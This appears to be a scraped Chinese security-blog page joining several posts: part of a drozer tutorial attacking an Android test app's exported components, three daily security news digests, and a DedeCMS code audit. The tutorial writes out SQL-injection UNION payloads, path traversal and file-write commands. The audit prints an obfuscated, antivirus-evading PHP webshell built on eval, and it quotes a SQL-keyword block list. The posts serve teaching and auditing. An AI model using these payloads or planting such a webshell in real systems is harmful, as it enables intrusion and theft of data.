通过drozer命令可以查询支持导出的service组件信息,支持导出则可能存在对应的漏洞。
run app.service.info -a com.asec.alan
1、任意文件写入漏洞
在 Android Service 场景中,当服务接收外部传入的文件路径参数并直接用于文件写入操作时,覆盖应用自身关键文件(配置文件、数据库等),导致应用的使用或者安全风险问题。
1)漏洞代码
当 Service 处理"com.asec.alan.ACTION_WRITE_FILE"动作时,会从 Intent 中直接读取filePath参数及需要写入的内容,并通过writeToFile()方法写入内容。但是writeToFile()直接使用传入的filePath创建File对象,未检查路径是否限制在应用私有目录
2)漏洞利用
通过drozer命令向/data/data/com.asec.alan/写入drozer_test.txt文件,文件内容为Test from drozer
run app.service.start --action com.asec.alan.ACTION_WRITE_FILE --component com.asec.alan com.asec.alan.VulnerableService --extra string file_path "/data/data/com.asec.alan/drozer_test.txt" --extra string content "Test from drozer"
利用adb shell连接android系统,切换为root权限后查看drozer_test.txt的存在和内容
adb shell
su
ls /data/data/com.asec.alan/drozer_test.txt
cat /data/data/com.asec.alan/drozer_test.txt
2、敏感信息泄露漏洞
敏感信息泄露指应用在运行过程中,将不应公开的敏感数据(如密码、密钥、令牌等)以明文形式存储、传输或输出,导致未授权主体可获取这些信息。
1)漏洞代码
当 Service 处理"com.asec.alan.ACTION_GET_SECRET"动作时,getSensitiveInformation()方法会返回包含数据库密码、API 密钥等核心敏感数据,并通过Log.d()输出到系统日志
2)漏洞利用
利用drozer命令启动com.asec.alan com.asec.alan.VulnerableService服务
run app.service.start --action com.asec.alan.ACTION_GET_SECRET --component com.asec.alan com.asec.alan.VulnerableService
通过adb的logcat查看对应的日志,成功打印出对饮的敏感数据。
adb logcat VulnerableService:D *:S
三、Broadcast Receiver
Broadcast Receiver 用于接收系统或应用间的广播,若实现不当会导致信息泄露或恶意调用。
1、伪造恶意广播漏洞
Receiver 未验证广播发送者身份,恶意应用可伪造广播触发敏感操作。
1)漏洞代码
该接收器未对广播发送者的身份进行任何验证,任何应用都可以发送com.asec.alan.ACTION_SENSITIVE_OPERATION动作的广播来触发其逻辑。并通过performSensitiveOperation方法执行敏感操作,测试使用Toast在界面弹窗展示,但整个调用链都没有权限检查机制。
2)漏洞利用
利用drozer伪造恶意广播并触发该接收器
run app.broadcast.send --action com.asec.alan.ACTION_SENSITIVE_OPERATION --component com.asec.alan com.asec.alan.VulnerableReceiver --extra string operation "test" --extra string data "test"
通过界面可以查看到对应的广播信息
四、Content Provider
Content Provider 用于数据共享,是最容易出现安全问题的组件,常见漏洞包括信息泄露、SQL 注入和目录遍历。
1、信息泄露漏洞
Content Provider 未限制访问权限,导致应用内敏感数据(如用户信息、数据库)可被任意读取。
1)漏洞代码:
通过该代码可以发现,未检查调用者是否有读取权限,可以直接调用sql进行数据的查询。
2)漏洞利用
利用drozer命令可以查看该APP的provider的信息
run app.provider.info -a com.asec.alan
利用app.provider.finduri可以查看所有的uri
run app.provider.finduri com.asec.alan
通过drozer查询content://com.asec.alan.provider/该uri的数据
run app.provider.query content://com.asec.alan.provider/
2、SQL 注入漏洞
Content Provider 在处理查询时直接拼接 SQL 语句,未使用参数化查询,导致 SQL 注入。
1)漏洞代码
通过代码发现将selection参数直接拼接进 SQL 查询字符串,未使⽤参数化查询或输⼊净化,完全信任外部输⼊。并且忽略了selectionArgs参数,该参数本应⽤于安全传递查询参数,调⽤rawQuery时未使⽤参数绑定功能,⽽是传递null。
2)漏洞利用
利用drozer的scanner.provider.injection可以查询该APP的Content Provider存在的SQL注入
run scanner.provider.injection -a com.asec.alan
基于sql注入漏洞的测试和利用,通过order by进行显示位的判断
run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 2"
run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 3"
run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 4"
并进行username和password数据的查询。
run app.provider.query content://com.asec.alan.provider/ --selection "1=1 UNION SELECT 1,username,password FROM users--"
3、目录遍历漏洞
Content Provider 的openFile()方法未验证文件路径,导致攻击者可访问应用沙盒外的任意文件。
1)漏洞代码
代码中使用uri.getEncodedPath()获取路径,未处理../或..\等路径跳转符,用户可控的uriPath直接与基础目录baseDir拼接,并没有对访问的文件类型、路径范围进行权限校验。
2)漏洞利用
利用drozer的scanner.provider.traversal对目录遍历漏洞进行检测,发现对应的uri
run scanner.provider.traversal -a com.asec.alan
并成功查询/system/etc/hosts文件内容
run app.provider.read content://com.asec.alan.provider/../../../../system/etc/hosts
本文利用drozer工具基于该APP的测试和操作,其实对于android app的组件漏洞的测试还有很多方法,通过其对四大组件的系统性检测,可有效发现权限控制缺失、输入验证不足等高危漏洞。在实际测试中,需结合静态代码分析(如查看 AndroidManifest.xml 的组件配置)与 Drozer 的动态交互测试,形成 "静态枚举 + 动态验证" 的闭环,才能全面评估组件的安全状态,为漏洞修复提供精准依据。
APP地址: https://pan.baidu.com/s/1l1thGur7wmMBXLWivqW6cg?pwd=4ggk
提取码: 4ggk
网络安全日报 2025年08月20日
1、Windows漏洞被利用投递PipeMagic勒索软件
https://securelist.com/pipemagic/117270/ 研究人员披露,威胁行为者正在利用微软Windows已修复的漏洞CVE-2025-29824(CLFS权限提升漏洞),投递PipeMagic恶意软件并实施RansomExx勒索攻击。据卡巴斯基与BI.ZONE报告,PipeMagic早在2022年就被用于针对东南亚工业企业的攻击,具备远程访问和命令执行能力。近期攻击主要发生在沙特和巴西,利用微软Azure托管组件,并通过伪装成微软帮助文件或假冒ChatGPT客户端作为加载器。微软将这些活动归因于威胁组织Storm-2460。该恶意软件采用模块化设计,并通过加密管道
2、PyPI封禁1800过期域名邮箱防供应链攻击
https://blog.pypi.org/posts/2025-08-18-preventing-domain-resurrections/ Python软件包索引库(PyPI)宣布实施新安全措施,主动检测并阻止与过期域名相关的邮箱,以防止账户被接管和供应链攻击。自2025年6月以来,PyPI已取消验证超1800个因域名过期而失效的邮箱,避免攻击者通过购买过期域名并利用密码重置功能接管维护者账户。这一风险在2022年已有先例,攻击者曾利用类似手法接管ctx库账户并上传恶意版本。虽然该措施并非万无一失,但可有效缩减攻击面,尤其对已被遗弃但仍广泛使用的软件包具有重要意义。PyPI强调,新机制能
3、英国撤销对苹果加密后门要求
https://thehackernews.com/2025/08/uk-government-drops-apple-encryption.html 英国政府已放弃强制苹果削弱加密并设置后门的计划,此举原本将允许访问美国公民的受保护数据。美国国家情报总监图尔西·加巴德在社交平台X上表示,美英双方经过数月沟通,最终促成英国撤销相关命令,以保障美国公民的公民自由。今年1月,英国内政部曾依据《调查权力法》向苹果下达技术能力通知,要求其为iCloud等端到端加密数据提供普遍访问途径,苹果随后在英国关闭了高级数据保护功能并提出法律上诉。批评人士指出,强制访问加密数据等同于建立后门,可能被犯罪分子或威
4、SAP组合漏洞利用工具公开威胁未修补系统
https://onapsis.com/blog/new-exploit-for-cve-2025-31324/ 安全公司Onapsis警告,新的公开利用工具正在滥用SAP NetWeaver的两个关键漏洞CVE-2025-31324和CVE-2025-42999,能够绕过认证并实现远程代码执行。尽管SAP已在今年4月和5月修补,但相关漏洞自3月起已被威胁组织作为零日利用。Qilin、BianLian、RansomExx等勒索团伙以及部分中国背景的间谍组织均被发现利用该链式攻击,目标涉及关键基础设施。该漏洞链允许攻击者上传任意文件、执行系统命令,并以SAP管理员权限完全接管业务数据与流程。研
5、研究人员将发布了FortiWeb身份验证完全绕过漏洞利用代码
https://www.anquanke.com/post/id/311301 一名安全研究人员发布了针对 FortiWeb 网络应用防火墙漏洞的部分概念性利用工具,该漏洞允许远程攻击者绕过认证。该漏洞已通过负责任的方式报告给 Fortinet,并被追踪为 CVE-2025-52970。Fortinet 已于 8 月 12 日发布修复补丁。
6、PostgreSQL核心组件曝高危漏洞,官方发布紧急修复补丁
https://www.anquanke.com/post/id/311307 PostgreSQL 全球开发组宣布了一项重要安全更新,影响所有受支持版本的 PostgreSQL 关系型数据库。此次更新适用于 PostgreSQL 17.6、16.10、15.14、14.19 和 13.22,以及 PostgreSQL 18 beta3。公告表示,本次更新共修复了 3 个安全漏洞,并修复了过去几个月内报告的 55 个以上缺陷。
7、攻击者正利用趋势科技Apex One命令注入漏洞
https://cybersecuritynews.com/cisa-warns-trend-micro-apex-one-flaw/ CISA警告趋势科技Apex One管理控制台存在高危漏洞CVE-2025-54948,攻击者可远程执行任意命令,无需认证。建议立即安装补丁或停用产品,CVSS评分9.8,风险极高。
8、"Noodlophile"恶意活动升级:利用版权钓鱼扩大全球攻击范围
https://thehackernews.com/2025/08/noodlophile-malware-campaign-expands.html "Noodlophile"恶意软件通过升级的钓鱼邮件和传播机制,针对多国企业窃取信息。攻击手法包括利用合法软件漏洞、Telegram混淆部署和动态载荷技术,重点窃取浏览器数据,并计划扩展键盘记录等功能,威胁持续升级。
9、新型GodRAT木马利用隐写术攻击金融交易机构
https://www.freebuf.com/articles/444948.html 卡巴斯基研究员Saurabh Sharma在最新技术分析报告中披露,金融交易和经纪公司正成为新型远程访问木马GodRAT的攻击目标。攻击者通过Skype即时通讯工具分发伪装成财务文档的恶意.SCR(屏幕保护程序)文件。该恶意活动最早可追溯至2024年9月9日,主要针对中国香港、阿联酋、黎巴嫩、马来西亚和约旦等地区。攻击采用隐写术(steganography)技术,将用于从C2服务器下载恶意软件的shellcode隐藏在图像文件中。
10、Smartbi存在远程代码执行漏洞
https://www.secrss.com/articles/82146 近日,奇安信CERT监测到官方修复Smartbi 远程代码执行漏洞(QVD-2025-31926),该漏洞源于攻击者可通过默认资源ID绕过身份验证获取权限,配合后台接口实现远程代码执行,可能导致服务器被完全控制、数据泄露或业务系统沦陷。鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年08月19日
1、研究员披露FortiWeb认证绕过漏洞
https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970 2025年8月,安全研究员Aviv Y公布了FortiWeb存在的严重漏洞(CVE-2025-52970)细节,并演示部分利用方法。该漏洞源于Cookie解析中的越界读取,使攻击者可触发Era参数异常,令服务器使用全零密钥进行会话加密与签名,从而轻易伪造认证Cookie并实现完整身份绕过,甚至冒充管理员。漏洞影响FortiWeb 7.0至7.6版本,Fortinet已于8月12日发布修复补丁,8.0版本不受影响。虽然攻击需受害者有活跃会话,并需对一个数值字段进行暴力破解,但搜索范
2、Workday遭Salesforce数据泄露事件波及
https://blog.workday.com/en-us/protecting-you-from-social-engineering-campaigns-update-from-workday.html 2025年8月,人力资源巨头Workday披露其数据遭遇泄露,起因是第三方CRM平台在社会工程攻击中被入侵。公司确认攻击者未能访问客户租户数据,但部分业务联系信息(如姓名、邮箱、电话)已外泄,可能被用于后续钓鱼与诈骗。事件最早于8月6日被发现。攻击者冒充人事或IT人员,通过短信和电话诱骗员工泄露敏感信息。据悉,该事件与近期ShinyHunters组织针对Salesforce实例的全球攻
3、微软Teams引入多项安全升级加强安全防护
https://www.microsoft.com/ro-ro/microsoft-365/roadmap?id=499893 2025年8月,微软宣布将为Teams引入多项安全升级,以应对恶意URL与高风险文件的威胁。根据Microsoft 365路线图,Teams将阻止在聊天和频道中传播可被武器化的文件类型(如可执行文件),并可检测、提醒用户恶意链接,降低恶意软件入侵风险。此外,Teams现已与Microsoft Defender for Office 365的租户阻止列表集成,管理员可直接封禁来自恶意域的聊天、会议与通话,并清除已有记录。该功能预计9月底前全球普及。微软今年还陆续上线屏
4、数百个TeslaMate因配置错误暴露特斯拉车辆敏感数据
https://cybersecuritynews.com/teslamate-leaks-vehicle-data/ 数百个TeslaMate实例因配置错误暴露特斯拉车辆敏感数据,包括GPS坐标和驾驶习惯。研究人员通过全网扫描发现漏洞,建议车主立即加强身份验证和访问控制,防止隐私泄露。
5、高危tar-fs漏洞致数百万系统面临任意文件写入风险
https://securityonline.info/cve-2025-48387-critical-tar-fs-vulnerability-exposes-millions-to-arbitrary-file-writes/ 高危漏洞CVE-2025-48387影响NPM包tar-fs,允许恶意tar文件通过目录遍历攻击任意写入系统文件,波及数万依赖项目。建议立即升级至v3.0.9/v2.1.3/v1.16.5或限制不可信文件解压。
6、1580万组PayPal明文凭证在黑客论坛兜售,或源自信息窃取恶意软件
https://hackread.com/threat-actor-selling-plain-text-paypal-credentials/ 黑客出售1580万组PayPal账户数据,含邮箱、明文密码及登录链接,标价750美元。数据或源自恶意软件窃取,可能引发凭证填充攻击。真实性待PayPal官方确认,若属实将成近年最大相关泄露事件之一。
7、Windows 11 24H2安全更新引发存储设备故障及数据损坏风险
https://cybersecuritynews.com/windows-11-24h2-security-update/ 微软KB5063878安全更新导致Windows 11 24H2用户SSD/HDD无法访问或数据损坏,尤其在大文件操作时风险加剧。建议暂缓安装更新并备份数据,微软尚未提供官方修复方案。
8、AMI Aptio UEFI 固件新漏洞威胁系统持久性安全
https://securityonline.info/new-firmware-flaw-in-ami-aptio-uefi-threatens-persistent-system-compromise/ AMI Aptio UEFI固件曝高危SMM漏洞(CVE-2025-33043),攻击者可利用指针验证缺陷在最高特权环境执行任意代码,实现持久性控制。建议立即安装厂商补丁,该漏洞影响广泛供应链设备。
9、Linux内核netfilter漏洞可导致攻击者权限提升
https://www.freebuf.com/articles/system/444775.html Linux内核netfilter的ipset子系统中发现一个高危漏洞,允许本地攻击者将权限提升至root级别。该漏洞存在于ipset框架的bitmap:ip实现中,源于处理CIDR格式IP地址范围时缺乏足够的范围验证。由于缺少边界检查,攻击者可触发内核空间的越界内存写入,最终实现完全控制系统。
10、2017年Office漏洞为何仍在威胁企业安全
https://securityonline.info/a-blast-from-the-past-why-a-2017-office-flaw-still-haunts-enterprises-today/ 微软Office漏洞CVE-2017-11882仍被利用,攻击者通过恶意文档实现远程代码执行。尽管微软2018年修复漏洞,但使用旧版的企业(如制造业)易受钓鱼攻击,需警惕伪装订单的恶意文件。
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年08月18日
1、研究发现微软Entra ID可被降级绕过FIDO认证
https://www.proofpoint.com/us/blog/threat-insight/dont-phish-let-me-down-fido-authentication-downgrade Proofpoint研究人员披露,一种新型降级攻击可在微软Entra ID中绕过FIDO无密码认证,迫使用户改用安全性较低的验证方式,从而使账号暴露于网络钓鱼与会话劫持风险。该方法通过Evilginx框架中的自定义“phishlet”伪装不支持FIDO的浏览器(如Windows版Safari),触发系统关闭FIDO认证并提示用户使用短信验证码、Authenticator应用或一次性密码等替
2、美司法部扣押BlackSuit逾百万美元加密资产
https://www.bleepingcomputer.com/news/security/us-govt-seizes-1-million-in-crypto-from-blacksuit-ransomware-gang/ 美国司法部宣布,已于2024年1月9日从BlackSuit勒索软件团伙扣押价值1091453美元的加密货币和数字资产。这笔资金源自2023年4月一起勒索案,受害者为获取解密工具支付了49.3枚比特币。执法部门追踪到黑客多次通过虚拟货币交易所转移资金以掩盖踪迹,最终在合作交易所冻结资产。本次行动继国际联合“将死行动”关闭BlackSuit暗网勒索门户后展开,严重打击了该
3、黑客泄露安联人寿280万条敏感数据
https://www.bleepingcomputer.com/news/security/hackers-leak-allianz-life-data-stolen-in-salesforce-attacks/ 美国保险巨头安联人寿(Allianz Life)遭黑客泄露约280万条来自Salesforce系统的敏感数据,涉及客户及业务合作伙伴信息。该事件源于7月16日的第三方云端CRM数据泄露,疑为ShinyHunters团伙发起,并与“Scattered Spider”“Lapsus$”有重叠。泄露数据包括姓名、地址、电话、出生日期、税号及执业资质等信息,受影响对象涵盖财富管理公司、经
4、全球行动冻结逾3亿美元涉诈加密资产
https://www.trmlabs.com/resources/blog/t3-financial-crime-unit-launches-t3-global-collaborator-program-over-250m-in-criminal-assets-frozen-as-binance-becomes-first-member 全球执法机构与区块链企业协作,成功冻结超3亿美元与网络犯罪及诈骗相关的加密货币资产。其中,T3金融犯罪单位(T3 FCU)联合TRM Labs、TRON、Tether及币安,自2024年9月以来已冻结超2.5亿美元非法资产,并打击“杀猪盘”等诈骗活动。另一
5、Plex紧急提醒用户修补安全漏洞
https://forums.plex.tv/t/plex-media-server/30447/687 媒体服务平台Plex于8月14日向部分用户发出紧急通知,要求立即更新Plex Media Server,以修补近期发现的安全漏洞。该漏洞影响版本为1.41.7.x至1.42.0.x,目前已在最新版本1.42.1.10060中修复。漏洞通过漏洞赏金计划被发现,尽管Plex尚未公布具体技术细节及CVE编号,但公司强调应尽快更新,以防攻击者逆向补丁并开发利用工具。此次官方通过邮件直接提醒用户更新,凸显问题的潜在严重性。鉴于Plex曾出现过被积极利用的远程代码执行漏洞,安全专家警告用户务必立即升
6、Cisco警告防火墙管理中心严重漏洞
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79 思科发布安全警告称,其Secure Firewall Management Center(FMC)软件RADIUS子系统存在严重远程代码执行漏洞(CVE-2025-20265),危害等级最高10分。攻击者可在认证阶段利用特制输入绕过验证,执行任意高权限命令。该漏洞影响FMC 7.0.7和7.7.0版本,当启用RADIUS认证时风险尤高。思科已提供修复补丁,建议立即更新;若无法
7、安卓木马PhantomCard滥用NFC窃取银行卡
https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil 研究人员发现一种名为PhantomCard的新型安卓木马在巴西活跃,该恶意软件通过NFC中继攻击窃取受害者银行卡信息并实现欺诈交易。木马伪装为“卡片保护”应用,借助仿冒的Google Play网页传播,并诱导用户将银行卡贴近手机以“验证”。实际上,应用会将卡片数据和PIN码传送至攻击者控制的NFC中继服务器,从而在POS机或ATM上完成交易,就像持有实体卡片一样。PhantomCard由NFC中继恶意
8、俄罗斯团伙利用MSC漏洞投放Fickle Stealer恶意软件
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hackers-call-social-engineering-abusing-brave-support-and-encrypthubs-expanding-arsenal/ 安全研究人员披露,俄罗斯黑客组织EncryptHub(又名LARVA-208、Water Gamayun)正利用微软管理控制台(MMC)框架漏洞CVE-2025-26633(“MSC EvilTwin”)发动攻击。该组织通过伪装为IT部门在Teams中发送请求,诱导目标执行伪造的M
9、HTTP/2新漏洞“MadeYouReset”引发DoS风险
https://deepness-lab.org/publications/madeyoureset/ 研究人员揭示,HTTP/2协议存在名为“MadeYouReset”的新漏洞(CVE-2025-8671),可被滥用发动大规模拒绝服务攻击。该漏洞突破了服务器通常限制的每连接100个并发请求上限,使攻击者能发送成千上万请求,导致合法用户无法访问,甚至引发内存崩溃。受影响产品包括Apache Tomcat(CVE-2025-48989)、F5 BIG-IP(CVE-2025-54500)和Netty(CVE-2025-55163)。漏洞利用方式与Rapid Reset类似,但攻击者无需主动发送
10、挪威水坝遭亲俄黑客破坏
https://www.vg.no/nyheter/i/mPJaE4/pst-sjefen-mener-pro-russiske-hackere-sto-bak-cyberangrepet-mot-damanlegget-i-bremanger 挪威警方安全局(PST)确认,亲俄黑客于今年4月入侵布雷曼格水坝的关键控制系统,远程开启泄洪阀门,导致720万升水在四小时内被排放。尽管事件未造成严重损害,但黑客通过发布控制面板视频在Telegram上展示入侵成果,意在彰显其能力并制造恐慌。PST局长指出,此类行动更多是影响和施压手段,而非单纯破坏。挪威情报部门则警告,俄罗斯正通过混合攻击手段持续对
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
意外搞出的免杀 Webshell 实战之织梦 CMS 到 RCE
前言
书接上文,在上次意外搞出的免杀 webshell 条件下,最近又去审计了一个织梦 CMS
官方网站 https://www.dedecms.com/
最后成功利用免杀 webshell 实现了 RCE,下面是审计过程和审计思路
环境搭建
去官网下载源码,然后配合 phpstudy 搭建就 ok 了
这个比较简单,注意根目录需要放 upload 目录
注意默认的管理员目录是 dede,访问/dede/login.php
默认账户密码adminadmin
代码审计
这里我只找 RCE 漏洞
首先对于 php 的话,就是找 sink 点,或者在后台功能点去看,一般审计多了,看到功能点就大概能猜出有哪些漏洞
sink 点的话可以使用一个工具
Seay 源代码审计系统
https://github.com/f1tz/cnseay虽然比较粗糙,误报很多,不过相比于语义分析的工具更能提升代码审计的技术
我们直接把源码丢进去就可以了
可以看到这个工具确实不太准确,因为 sink 点实在太多,不过熟练后,一眼就知道哪些不需要去管的
然后这里我只关注能够 RCE 的漏洞
找到之后没有什么技巧,就是回头看参数是否可以控制
下面举个例子
案例 1
比如这句话,一眼就感觉有漏洞,我们就需要去详细查看一下
<?php /*<meta name="9Rrdzo" content="a">*/
$password='UaUahObGMzTnBiMjVmYzNSaGNuUW9LVHNLUUhObGRGOTBhVzFsWDJ4cGJXbDBLREFwT3dwQVpYSnliM0pmY21Wd2aIzSjBhVzVuS0RBcE93cG1kVzVqZEdsdmJpQmxibU52WkdVb0pFUXNKRXNwZXdvZ0lDQWdabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1JFS1Rza2FTc3JLU0I3Q2lBZ0lDQWdJQ0FnSkdNZ1BTQWtTMXNrYVNzeEpqRTFYVHNLSUNBZ0lDQWdJQ0FrUkZza2FWMGdQU0
$username = get_meta_tags(__FILE__)[$_GET['token']];
header("ddddddd:".$username);
$arr = apache_response_headers();
$template_source='';
foreach ($arr as $k => $v) {
if ($k[0] == 'd' && $k[5] == 'd') {
$template_source = str_replace($v,'',$password);
}}
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
$aes_decode[1]=$key;
@eval($aes_decode[1]);
$NkM1M7 = "..............";
if( count($_REQUEST) || file_get_contents("php://input") ){
}else{
header('Content-Type:text/html;charset=utf-8'); http_response_code(405);
echo base64_decode/**/($NkM1M7);
}
我们可以看到这个参数其实是不能控制的
`aes_decode[1]就是 $key,等价于$template_source
$template_source = str_replace($v, '', $password);
来源于$password
而其中 password 是固定的,所以不可以控制
案例 2
function DeleteFile($filename)
{
$filename = $this->baseDir.$this->activeDir."/$filename";
if(is_file($filename))
{
@unlink($filename); $t="文件";
}
else
{
$t = "目录";
if($this->allowDeleteDir==1)
{
$this->RmDirFiles($filename);
} else
{
// 完善用户体验,by:sumic
ShowMsg("系统禁止删除".$t."!","file_manage_main.php?activepath=".$this->activeDir);
exit;
}
}
ShowMsg("成功删除一个".$t."!","file_manage_main.php?activepath=".$this->activeDir);
return 0;
}
}
是一个方法,这种需要寻找调用这个方法的地方
else if($fmdo=="del")
{
$fmm->DeleteFile($filename);
}
这种是一个典型的控制器,根据 fmdo 来选择对应的操作
不过根据所在的文件的注释
/**
* 文件管理控制
*
* @version $Id: file_manage_control.php 1 8:48 2010年7月13日 $
* @package DedeCMS.Administrator
* @founder IT柏拉图, https://weibo.com/itprato
* @author DedeCMS团队
* @copyright Copyright (c) 2004 - 2024, 上海卓卓网络科技有限公司 (DesDev, Inc.)
* @license http://help.dedecms.com/usersguide/license.html
* @link http://www.dedecms.com
*/
这里就能大概猜到了
是一个文件管理器,可能对应着删除按钮,我们尝试能不能目录穿越
不过这里是做了限制的
$filename = preg_replace("#([.]+[/]+)*#", "", $filename);
移除 ../ 形式的路径穿越字符
而且下面还会直接移除..
所以考虑放弃
案例 3
定位到 sys_sql_query.php 文件了
发现可以执行 sql
if(preg_match("#^select #i", $sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "运行SQL:{$sqlquery},无返回记录!";
}
else
{
echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j > 100)
{
break;
}
echo "<hr size=1 width='100%'/>";
echo "记录:$j";
echo "<hr size=1 width='100%'/>";
foreach($row as $k=>$v)
{
echo "<font color='red'>{$k}:</font>{$v}<br/>\r\n";
}
}
exit();
}
if($querytype==2)
{
//普通的SQL语句
$sqlquery = str_replace("\r","",$sqlquery);
$sqls = preg_split("#;[ \t]{0,}\n#",$sqlquery);
$nerrCode = ""; $i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "执行: <font color='blue'>$q</font> 出错,错误提示:<font color='red'>".$errCode."</font><br>";
}
}
echo "成功执行{$i}个SQL语句!<br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo "成功执行1个SQL语句!<br><br>";
echo $nerrCode;
}
exit();
}
而且 sql 语句是可以控制的
跟进执行的地方发现
function Execute($id="me", $sql='')
{
global $dsqli;
if(!$dsqli->isInit)
{
$this->Init($this->pconnect);
}
if($dsqli->isClose)
{
$this->Open(FALSE);
$dsqli->isClose = FALSE;
}
if(!empty($sql))
{
$this->SetQuery($sql);
}
//SQL语句安全检查
if($this->safeCheck)
{
CheckSql($this->queryString);
}
$t1 = ExecTime();
//var_dump($this->queryString);
$this->result[$id] = mysqli_query($this->linkID, $this->queryString);
//var_dump(mysql_error());
//查询性能测试
if($this->recordLog) {
$queryTime = ExecTime() - $t1;
$this->RecordLog($queryTime);
//echo $this->queryString."--{$queryTime}<hr />\r\n";
}
if($this->result[$id]===FALSE)
{
$this->DisplayError(mysqli_error($this->linkID)." <br />Error sql: <font color='red'>".$this->queryString."</font>");
}
}
是有一个 checksql 的检查的
//SQL语句过滤程序,由80sec提供,这里作了适当的修改
if (!function_exists('CheckSql'))
{
function CheckSql($db_string,$querytype='select')
{
global $cfg_cookie_encode;
$clean = '';
$error='';
$old_pos = 0;
$pos = -1;
$log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt';
$userIP = GetIP();
$getUrl = GetCurUrl();
//如果是普通查询语句,直接过滤一些特殊语法
if($querytype=='select')
{
$notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";
//$notallow2 = "--|/\*";
if(preg_match("/".$notallow1."/i", $db_string))
{
fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error step 1 !</font>");
}
}
//完整的SQL检查
while (TRUE)
{
$pos = strpos($db_string, '\'', $pos + 1);
if ($pos === FALSE)
{
break;
}
$clean .= substr($db_string, $old_pos, $pos - $old_pos);
while (TRUE)
{
$pos1 = strpos($db_string, '\'', $pos + 1);
$pos2 = strpos($db_string, '\\', $pos + 1);
if ($pos1 === FALSE)
{
break;
}
elseif ($pos2 == FALSE || $pos2 > $pos1)
{
$pos = $pos1;
break;
}
$pos = $pos2 + 1;
}
$clean .= '$s#39;;
$old_pos = $pos + 1;
}
$clean .= substr($db_string, $old_pos);
$clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));
if (strpos($clean, '@') !== FALSE OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE
OR strpos($clean,'$s$s#39;)!== FALSE)
{
$fail = TRUE;
if(preg_match("#^create table#i",$clean)) $fail = FALSE;
$error="unusual character";
}
//老版本的Mysql并不支持union,常用的程序里也不使用union,但是一些黑客使用它,所以检查它
if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="union detect";
}
//发布版本的程序可能比较少包括--,#这样的注释,但是黑客经常使用它们
elseif (strpos($clean, '/*') > 2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)
{
$fail = TRUE;
$error="comment detect";
}
//这些函数不会被使用,但是黑客会用它来操作文件,down掉数据库
elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="slown down detect";
}
elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="slown down detect";
}
elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="file fun detect";
}
elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0)
{
$fail = TRUE;
$error="file fun detect";
}
//老版本的MYSQL不支持子查询,我们的程序里可能也用得少,但是黑客可以使用它来查询数据库敏感信息
elseif (preg_match('~\([^)]*?select~s', $clean) != 0)
{
$fail = TRUE;
$error="sub select detect";
}
if (!empty($fail))
{
fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||$error\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");
}
else
{
return $db_string;
}
}
}
案例 4
基于这个文件管理,我们还是在这个类,肯定还有编辑文件的说法
我们来到对应的路由去查看
果然找到了
//文件编辑
/*---------------
function __saveEdit();
----------------*/
else if($fmdo=="edit")
{
csrf_check();
$filename = str_replace("..", "", $filename);
$file = "$cfg_basedir$activepath/$filename";
$str = stripslashes($str);
$fp = fopen($file, "w");
fputs($fp, $str);
fclose($fp);
if ($fp === false) {
ShowMsg("保存失败!请检查文件是否可写", -1);
exit();
}
if(empty($backurl))
{
ShowMsg("成功保存一个文件!","file_manage_main.php?activepath=$activepath");
}
else
{
ShowMsg("成功保存文件!",$backurl);
}
exit();
}
